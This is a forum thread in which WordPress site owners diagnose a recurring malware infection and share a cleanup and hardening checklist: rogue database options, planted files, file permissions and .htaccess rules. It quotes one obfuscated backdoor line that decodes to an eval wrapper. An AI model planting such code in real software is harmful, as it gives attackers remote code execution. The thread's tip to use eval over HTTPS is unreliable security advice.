Files being added to one of my sites

WOW, what a hack, no wonder your hosting providers got problems, see the function name below (line 73 in wp-ajax-gadget.php), I really liked it, even-though, am on the good side.

$evil=create_function(‘$a’,”\x72\x65tu\x72\x6e\x20\x65\x76\x61l(\x24a);”

No wonder, hosting providers are confused, this is not a hack, this is an invasion.

No wonder, re-installation never worked.If I am right,they used and enhanced the F-ARMA hack technique.This hack is very smart, creating the hack dynamically from the database.The last place, we or our defenders would check,isn’t the data that we stored!!!!!. No wonder, it made all those people puzzled.I really hope, I am wrong.

But don’t worry, we will do it, I am all in.

The following is a step by step solution checklist (some items might be true and applicable to you and other might not be, but you should complete it all, to prevent this problem from recurrence) to remove and harden your WordPress:

1. Check and Clear your WP-Database from rogue entries

Now, you need to check your phpmyadmin, in the following order:

Check all used wordpress databases for priviliged users,both in: wp_users table and the cpanel/mysql users for that table, make sure they match.

Check the wp-options table for each used database by doing the following:
click on the wp_options table, and this will allow you to browse the table contents.
Use the phpMyAdmin search function, which you can access by clicking the Search tab at the top of the page
search the option_name field for the following rogue database entries, and delete when found:

widget_generic_support

ftp_credentials

fwp

wp_check_hash

class_generic_support

rss_% — In this case, delete all matches EXCEPT rss_language, rss_use_excerpt, and rss_excerpt_length (these are ok). Use the LIKE operator = rss.

2. Remove Malicious Code and Files:

Search your plugins folder for these two files, and delete permanently: wp-ajax-gadget.php & zipper-class.php Please note that you might find multiple instances of them, DELETE THEM ALL

Check all your php files for code lines at the header and the footer (even if there are too many lines, make sure you reach the last line), check out for functions like eval(basedecode64, decode*). Remove them all.Refer to what timeuser found, as an example.Start with the wp-includes folder.It maybe a lengthy process, but because its truly a smart hack.

Check out for directories names starting with a period, for example, Erko Risthein, had wp-admin/includes/.svn/class-wp-theme-edit.php. This .svn is not a standard directory to includes, and additionally, directory names don’t start, this includes a file that needs to be checked, in case you find codes as specified in the previous clause.DELETE FILES & FOLDERS.

3. Hardening & Protecting your WP:

Folders permissions should be 755, while FILES should be 644, as for timeuser and rsconsult, both their folders and files permissions are 755.
Open the .htacess, and ensure that the rewrite rules below are somewhere in your file. The purpose of these rewrite rules are to block any access to wp-includes files, the main back door discovered
If this helped you should give:

Thanks to Erko Risthein & rsconsult for their contribution.

Special Thanks for timeuser, whom without, this would haven’t been done.

Regards.

Step by Step Guide UPDATE: Step 4
Note:This step complements the above mentioned steps.
Important: All the Above and following steps (1 TO 4)should be done sequentially with no time delay in-between, to eliminate possible reproduction.

4.1 WHAT?

AJAX is not a single technology, its a group of them, therefore, the proper securing of plug-ins utilizing it, requires experience with these technologies collectively and not only one of them.AJAX makes interaction with users more smooth and responsive, and is highly recommended for consideration when YOU (not someone else) develop your own plugins or themes. However, it’s vital that AJAX is implemented correctly and securely, otherwise the consequence could be disastrous.

4.2 WHY?

To eliminate threats and harden AJAX handlers implemented by plugins utilizing AJAX technologies, because MOST of plugins developers have high focus on developing FUNCTIONAL plugins, and a very low focus on security. They seldom keep the balance to develop a SECURE FUNCTIONAL plugins.

4.3 WHERE?

This applies to all your installed plugins (activated and deactivated) utilizing the AJAX technology.One of the very common uses of AJAX are Forms plugins, however, all plugins utilizing AJAX will be scanned and dealt with accordingly.You can identify the answer immediately by reading the plugin description

4.4 HOW?

4.4.1 If the plugin is NOT USED by your website, please DELETE immediately. (This applies to activated and deactivated plugins not in use.)

4.4.2 If the plugin is IN-USE and NOT A MUST TO USE, consider using jQuery form plugin that utilizes the built-in wordpress jQuery Ajax submission handler, OR any other that satisfies your need

4.4.3 If the plugin is IN-USE and A MUST TO USE,then if you are:

4.4.3.1 An Experienced programmer, please review the plugin code and ensure that it implements the following tips:

4.4.3.1.1 Use nonces and checks for permission
4.4.3.1.2 Use admin-ajax.php to handle AJAX requests
4.4.3.1.3 Use wp_localize_script() to declare javascript global variables
4.4.3.1.4 Use “XMLHttpRequest” for JSON parsing over HTTP, ONLY USE “Eval” over HTTPS..

4.4.3.2 An Intermediate programmer, you will have to wait for the detailed update that will be posted within a day or two.

FOR ALL THREAD PARTICIPANTS.
LET’S AS A TEAM, DEVELOP A PROPER DOCUMENTED GUIDE FOR THIS DISASTROUS RECURRING PROBLEM AND SUBMIT IT TO WORDPRESS, AS OUR CONTRIBUTION.
THEREFORE, FEEL FREE TO ADD,SUGGEST AND ENHANCE, TILL ITS FINALIZED.
As dear Erko mentioned, she submitted a ticket to WordPress Support, and she didn’t receive an answer yet.

Erko had submitted a request to Dreamhost – the hosting company, not WordPress.

I plan on going through your steps above on all my sites today to try and get this eradicated. Luckily I have separated most of my sites so there shouldn’t be any reinfection to cleaned sites from sites I have not got to yet.

Thank you Nihad Nagi and timeuser for working through this yesterday!

Update: Step 3 (Rewrite rules were not mentioned above,Sorry)

3. Hardening & Protecting your WP:

3.1 Folders permissions should be 755, while FILES should be 644, as for timeuser and rsconsult, both their folders and files permissions are 755

3.2 Open the .htacess, and ensure that the rewrite rules below are somewhere in your file. The purpose of these rewrite rules are to block any access to wp-includes files, the main back door discovered

# Block the include-only files.
RewriteEngine On
RewriteBase /
RewriteRule ^wp-admin/includes/ – [F,L]
RewriteRule !^wp-includes/ – [S=3]
RewriteRule ^wp-includes/[^/]+\.php$ – [F,L]
RewriteRule ^wp-includes/js/tinymce/langs/.+\.php – [F,L]
RewriteRule ^wp-includes/theme-compat/ – [F,L]

You are welcome RS.Thanks for the info.

Thanks Nihad Nagi. Hopefully this has it all cleaned up AND stops this exploit from reoccurring.

All the thanks is yours, timeuser.
Note, that we are in a monitoring mode, to ensure the effectiveness of our solution.
It’s been my pleasure.
Regards

I have a fresh infected site to test this with. WP File Monitor just notified me of the following file changes:

Files Changed:
/wp-content/plugins/hello.php
/wp-content/plugins/index.php
/wp-includes/post-template.php

Files Added:
/wp-admin/css/edit-form-header.php
/wp-admin/images/options-meta.php
/wp-content/plugins/wordpress-file-monitor-plus/wp-ajax-gadget.php
/wp-includes/https.php
/wp-inclu des/images/list362.gif
/wp-includes/images/nix212.doc
/wp-includes/images/nix37.jpg
/wp-includes/images/pub16.doc
/wp-includes/images/pub440.doc
/wp-includes/images/pub784.doc
/wp-includes/images/sched158.gif
/wp-includes/images/sched382.gif
/wp-includes/theme-compat/class-https.php

I have already deleted the Hello Dolly plugin. I apparently overlooked it when the site was setup. Site is running on the most current version of WordPress (3.3.1 at this time) and the following plugins:

Akismet – v. 2.5.5
Filter Posts in Pages – 2.1.4
kStats Reloaded – 0.7.4
WordPress Database Backup – 2.2.3
WordPress File Monitor Plus – 1.4.1

I’m in process of going through all the steps that were provided to clear this out. Will post back as I progress.

-linda

Here is the code that was added to the wp-includes/post-template.php file – https://pastebin.com/AHC7LvDE

Ok, here are the notes from going through Nihad Nagi’s steps.

Step #1 – none of those options were found in the database.

Step #2 – Deleted the hello dolly plugin that was inadverdently left.
Replaced wp-content/plugins/index.php with a clean version even though the file did not look to have been altered
Restored an original wp-includes/post-template.php *See previous post to see what code had been added to this file
Deleted all the files that were added per WP-File monitor as well as wp-content/plugins/kstats/zipper-class.php and wp-content/plugins/merlic-filter-posts/wp-ajax.gadget.php

Step #3 – Changed permissions to all files under wp-includes and its subfolders to 644
Added block on wp-includes files in .htaccess

I think that is everything. *crossing fingers* that this works.

I Have fallen victim to the same hack…

Though I have added the rewrite rules to .htaccess:

https://pastebin.com/bGaVbea8

But the same files made their way back to my folders:

Timestamp: Mon, 26 Mar 2012 01:49:00 +0000

Added:

https://pastebin.com/bLYhevnT

Tried to follow all the suggestions but never found any rogue entries in the dababase.

Any ideas anyone?

Vince

I just noticed I had overlooked a file uploaded 05/06/11 called

options-foot.php in /wp-admin/network/

https://pastebin.com/AeetQgUb

Could this be enough for re-entry?

Regards,

Vince

Yes Vince, that’s why I emphasized that the steps should be done collectively and in sequence.
Good luck

To everyone,
It’s been two weeks now, and from the quietness in this forum, I can conclude that so far so good.
Regards to all.

Thanks!

I’ll keep an eye if anything pops back in after this clean up